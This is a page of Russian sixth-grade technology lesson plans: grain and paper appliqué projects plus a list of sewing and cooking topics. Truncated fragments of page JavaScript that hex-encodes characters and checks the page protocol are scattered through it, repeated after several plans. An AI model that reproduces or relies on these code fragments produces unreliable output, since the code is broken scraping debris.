Технология

  • Конструкт-урока по технологии на тему: Аквариум ( 6 класс) Тема : аппликация из окрашенных зёрен - Бабочка. Цели урока : совершенствование навыков в технике аппликации. Развивать творческие способности воображения; воспитывать у детей аккуратность, эсте-тический вкус, глубокие и устойчивые интересы к художественному труду. Тип урока : урок освоения новых знаний и способов действий. Универсальные учебные действия : ... Этап урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1.Приветствие 2. Представление 3. Проверка готовности рабочих мест - Здравствуйте, садитесь. - Меня зовут Ульяна Викторовна, сегодня урок технологии у Вас буду вести я. - Прозвенел звонок и смолк, Нам пора начать урок! Сели тихо, замолчали. Всё, что надо вы достали. Приготовились к уроку, В нём иначе нету проку. ... - Приветствие; - Проверка готов-ности рабочих мест Р3 К1 II. Постановка цели и задач уро-ка. Мотивация учебной деятель-ности учащихся. 1. Мотивация дея-тельности учащи-хся. 2. Раскрытие те-мы через загадку. - На большой цветной ковёр Села эскадрилья - То раскроет, то закроет Расписные крылья. Слайд 1. - Сегодня нам предстоит очень кропотливая работа. Мы будем изготовлять аппликацию из нео-бычного материала - крашенного зерна в виде мозаики. - Ответ учащихся (бабочка). - Знакомство с целью урока. П1 III. Актуализация опорных знаний. 1. Повторение понятия апплика-ция. - Ребята, кто ответит мне, что такое аппликация ? - Что такое мозаика? - Аппликация - один из видов изобразительной техники, который основан на выре-зании и наложе-нии различных материалов на определённый фон. Мозаика - это узор из скреп-лённых друг с другом кусочков различных твёр-дых материалов. IV. Первичное усвоение новых знаний. 1. Рассказ о бабо-чках и зерне. 2. Рассказ уча-щихся о бабочках и зёрнах. - Сегодня мы будем изготавли-вать аппликацию - мозаику из зёрен, которое мы привыкли видеть на столе в виде каш. - Какие крупы Вы знаете ? - А Вы знаете как получают кру-пы ? - Рис растёт в чеках. Слайд 2. Это плоские поля, окружённые небольшими дамбами, залитые водой. Рис очень распространё-нный продукт. Его употребляют в пищу люди во всём мире. В Китае, Японии, ... - Крупы делают из злаковых куль-тур, которые вы-ращивают на по-лях. - Беленькие бабочки. К1 П1 П3 V. Динамическая пауза. - Мы шагаем друг за другом, Лесом и зелёным лугом, Крылья пёстрые мелькают, В поле бабочки летают. Раз, два, три, четыре, Полетели закружились. - Шагают на мес-те. - Изображают ба-бочек : машут ру-ками и кружатся. VI. Организация самостоятельной работы. 1. Пошаговая ин-струкция по вы-полнению работы - Нашу работу мы начнём с ок-рашивания зёрен. Для этого по-дайдут обычные пластиковые стаканчики. Разбавив краски водой, засыпаем пшено или рис и тщательно размешиваем пало-чкой. Когда зёрна окрашены, их нужно выложить для сушки на чистый лист бумаги равномер-ным слоем. Когда зёрна подсох-нут, отделите их от бумаги и друг от друга. Для этого круго-выми движениями нажимайте на слой зёрен. Политра красок очень широка. Разные оттенки красного, голубого, зелёного, чёрный, коричневый, розовый и мног... - Выполнение ра-боты. К1 П2 Р2 VI. Рефлексия учебной деятель-ности. 1. Выставка из работ. 2. Итог урока. - Давайте выставим Ваши рабо-ты на доске. - Чьи бабочки получились самы-ми красивыми. - Что Вам понравилось сегодня на уроке ? - Из каких материалов Вы делали сегодня аппликацию ? - В конце занятия раскрасьте ма-леньких бабочек в красный цвет, если урок понравился и синим, если урок не поняли. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Презентация по технологии на тему Пудель ( 6 класс)Тема : Пудель - аппликация из кругов. Цели урока : совершенствование техники аппликации; развивать у детей способности к творчеству, воображению, фантазии. Тип урока - урок усвоения новых знаний и способов действий. Универсальн... Этап урока, виды работ Деятельность учителя Деятельность учеников УУД I. Организационный момент 1. Приветствие 2. Проверка готовности рабочих мест - Приветствие. - проверьте всё ли у вас готово к уроку. На ваших столах должны лежать : цветная бумага, клей, карандаш, бархатный картон, ножницы, вата, шаблон собаки. - Приветствие. - Проверка готовности рабочих мест. Р3 К1 II. Постановка целей и задач урока 1. Мотивация учебной деятельности 2. Раскрытие темы через загадку. - Сегодня мы изготовим с вами домашнее животное, а какое вы узнаете разгадав загадку: Я верный человека друг. Имею множество заслуг. На цепь привязан во дворе. Зимою сплю я в конуре. Охочусь с другом на волков. Пасу на пастбище коров. Бегу по Тундре вековой В упр... - Собака. - Знакомство с целью урока. П1 III. Актуализация опорных знаний 1. Повторение понятия аппликация - Сегодня мы будем выполнять аппликацию собачка Пудель из ваты. Ребята кто знает, что такое аппликация ? - Аппликация - это один из видов изобразительной техники, который основан на вырезании и наложении различных материалов на определённый фон. П1 К1 К2 IV. Первичное усвоение новых знаний 1. Рассказ о собаках 2. Рассказ о пуделе 3. Рассказ учащихся о своих домашних собаках. - Обычная собака живёт 15 лет. В настоящее время известно около 400 парод собак. Они отличаются друг от друга размером, формой тела, окрасом, поведением и предназначением. Собаки бывают охотничьи, сторожевые и служебные. А есть собачки, которые хозяева держат в доме из - за красивого внешнего вида. Это, например, пудель. Это очень древняя порода собак. Когда - то он был охотничьей собакой, приученной приносить дичь из воды. Со временем красоту этих собак оценили вельможы. Вельможы стали держать... - Слушают учителя. - Рассказы учащихся о своих собаках. К1 П1 П3 V. Динамическая пауза. - Во дворе щенок играл, Прыгал, бегал и считал : Раз- два прыжок и два кивка, Два - на право голова, Три - на лево поворот - И помчался до ворот, А потом вздохнул и сел. Он устал и присмирел. - Дети выполняют движения в соответствии со стихом. VI. Организация самостоятельной работы 1. Пошаговая инструкция. - Приступаем к работе. По шаблону обводим контур пуделя на обыкновенной бумаге или картоне, клеем контур на бархатную бумагу. Оформляем гриву, ножки и хвостик ватой в соответствии с образцом. Гриву делаем накладывая вату на бархатную бумагу. И аккуратно расправляя. Так же поступаем с хвостиком и ножками. - Поэтапное выполнение работы. К1 П2 Р2 VII. Итог урока. Рефлексия. 1. Выставка работ 2. Итог урока - Давайте сделаем мини выставку на доске из ваших работ. - Что вам понравилось сегодня на уроке ? - Что нового вы узнали ? - Покажите мне реакцию смайлика на урок. Если урок понравился то нарисуйте смайлику улыбку, а если нет то обыкновенного без улыбки. - Коллективное обсуждение работ. К 3 П 3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Мастер-класс занятия кружка по технологии Знай. Умей. ТвориИзготовление игольницы Шляпка позволяет развить интерес к созданию изделий своими руками на основе развития детского творчества, что помогает изучить быт, культуру народов и историю создания игрушек. Эта технология способствует формированию умений и навыков ручных работ, применению знаний на практике, приобретению критериев самооценки. Проявляются настойчивость, терпение и изобретательность. У детей развивается память, внимание и аккуратность.
  • Конструкт - урока по технологии на тему: Виноград (6 класс)Тема : Виноград - аппликация из бумаги и природных материалов. Цели урока : совершенствование навыков техники аппликации, развивать способности к творчеству, воображению, фантазии; прививать навыки культуры, труда, товарищеской взаимопомощи; воспитывать устойчивые интересы к художественному труду. ... Этапы урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1. Приветствие 2. Проверка готовности рабочих мест 3. Повторение техники безопасности - Приветствие. - Проверьте, всё ли у вас готово к уроку ? На ваших столах должны лежать: цветная бумага, клей карандаш, ножницы, соль, трафареты. - Повторим технику безопасности. - Приветствие. - Проверка готовности рабочих мест. - Повторение техники безопасности. Р3 К1 II. Постановка целей и задач урока 1. Мотивация учебной деятельности учащихся 2. Раскрытие темы через загадку - Нам предстоит тяжелая, но интересная работа, сегодня мы выполним аппликацию . А что мы будем делать, вы узнаете разгадав загадку : Как гирлянды яркие, Украшая сад, Спелые и сладкие Гроздья в ряд висят. Спеет, наряжается В крас... - Виноград. П1 III. Актуализация опорных знаний. 1. Повторение понятия аппликация - Кто мне скажет, что такое аппликация ? - Аппликация - это один из видов изобразительной техники, который основан на вырезании и наложении различных материалов на определённый фон. П1 К1 П2 IV. Первичное усвоение новых знаний 1. Рассказ о винограде 2. Рассказ учащихся о винограде. - Слайд 2. - Виноград - это очень древняя культура. Произрастает в южных районах. Ягоды собраны в гроздья и их срезают большими ножницами и складывают в корзины. В жарком климате виноград слаще мёда, а в прохладном кислый. Ягоды имеют разнообразную окраску : фиолетовые, малиновые, чёрные, синие, жёлтые, оранжевые, зелёные, розовые. Виноград -это клад витаминов и минералов. Из винограда делают соки, вино, сушат (изюм), из семечек получают масл... - Слушают учителя. - Рассказывают о винограде, который растёт дома. К1 П1 П3 V. Динамическая пауза - Идём собирать виноград, срываем гроздья и складываем виноград в корзину. - Повторяют в среднем темпе несколько раз. VI. Организация самостоятельной работы 1. Пошаговая инструкция выполнения работы - На цветной картон светлых тонов в верхней части приклеиваем вырезанные по трафарету виноградные листья. Из цветной бумаги вырезаем кружочки и овалы синего, или зелёного, или розового цвета. Вырезаем у них средину. Из получившихся заготовок оформляем кисть винограда, приклеивая заготовки поочерёдно. Средину виноградинки промазываем клеем и засыпаем солью. После того как соль приклеится окрашиваем её в цвет нашего винограда. Слайд 4. - Выполнение работы. К1 П2 Р2 VII. Итог урока. Рефлексия. - Давайте сделаем мини выставку из ваших работ на доске. - Что вам понравилось на уроке ? - Если понравился урок и вы его поняли то поднимите ваши работы, а если нет то не поднимайте. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Тема: Построение чертежа фартука с нагрудником в масштабе 1: 4
  • Тест «Обработка пищевых продуктов» 6 классДанный тест по технологии предназначен для учащихся 6 классов контроля уровня знаний и умений учащихся по разделу Обработка пищевых продуктов. Вопросы подобраны относительно возраста и раздела в области Технология. Тест способствует успешному интеллектуальному развиттию учеников как личности. Тест представлен в выборе одного или нескольких вариантов ответов. Вопросы данного теста могут использоваться при составлении кроссвордов, презентаций, докладов, интеллектуальных игр и викторин. Вопр...
  • Тема: Знакомство с изделием (фартук с нагрудником)
  • ТЕМА: Подготовка выкройки и ткани к раскрою. Раскрой изделия
  • Тема: Раскрой накладного кармана с отворотом и обработка отворота накладного кармана
  • Тема: Обработка гладкого накладного кармана
  • Тема: Обработка накладной ластовицы и соединение ластовицы с изделием
  • Тема: Накладной карман: Назначение и фасоны. Познакомить с видами накладных карманов и их фасонами
  • Тема: Обработка накладной ластовицы и соединение ластовицы с изделием
  • Тема: Обработка накладной ластовицы и соединение ластовицы с изделием
  • Тема: Подготовка деталей кроя трусов-плавок к обработке
  • Тема: Подготовка деталей кроя трусов-плавок к обработке
  • Тема: Раскрой трусов - плавок в натуральную величину
  • Тема: Построение чертежа трусов-плавок в натуральную величину и изготовление выкройки накладной ластов
  • Планирование урока: Знакомство с изделием (кепи, береты)Тема: Знакомство с изделием(кепи, береты). Цель: Ознакомить с назначением головных уборов, их фасонами. Задачи :Образовательная – помочь обучающимся выбирать фасоны головных уборов по журналам мод. Воспитательная – воспитывать чувство ответственности за выполняемую работу,аккуратность, наблюдательность. Коррекционно – развивающая – развивать устойчивое внимание, память, глазомер,профессиональную речь, мелкую моторику. Тип урока – Объяснение нового материала. Методы обучения – словесные, на...
  • Планирование урока Познакомить обучающихся с устройством иглы, с неполадками в швейной машинеТЕМА УРОКА:МАШИННАЯ ИГЛА. ЦЕЛЬ: Образовательная---дать краткие сведения об истории происхождения иглы; Познакомить обучающихся с устройством иглы, с неполадками в швейной машине, вызванные дефектами или не правильной её установкой; научить устанавливать иглу. Воспитательная- воспитывать внимательность, наблюдательность, аккуратность в работе. Наглядность и оборудование:таблицаУстройство иглы, швейная машина, швейные нитки, иглы ,отвёртка. Словарная работа: машинная игла, колба, лыска, ...
  • Урок по технологии Конкурс хозяюшка. (6 класс)
  • Построение чертежа конической и клиньевой юбок
  • Внеклассное мероприячтие по теме Масленица
  • Планирование по технологии для неделимых классов (6 касс)
  • РАБОЧАЯ ПРОГРАММА ТЕХНОЛОГИЯ 6 КЛАСС ФГОС
  • Итоговое тестирование по технологии 6 класс
  • Урок по технологии Крупы и макаронные изделия
  • Урок по технологии по теме: Натуральные волокна животного происхождения + Презентация
  • Урок по технологии на темуМолочные продукты
  • Внеклассное мероприятие по технологии Викторина путешествие по морям профессий (мальчики 6 класс)
© 2010-2018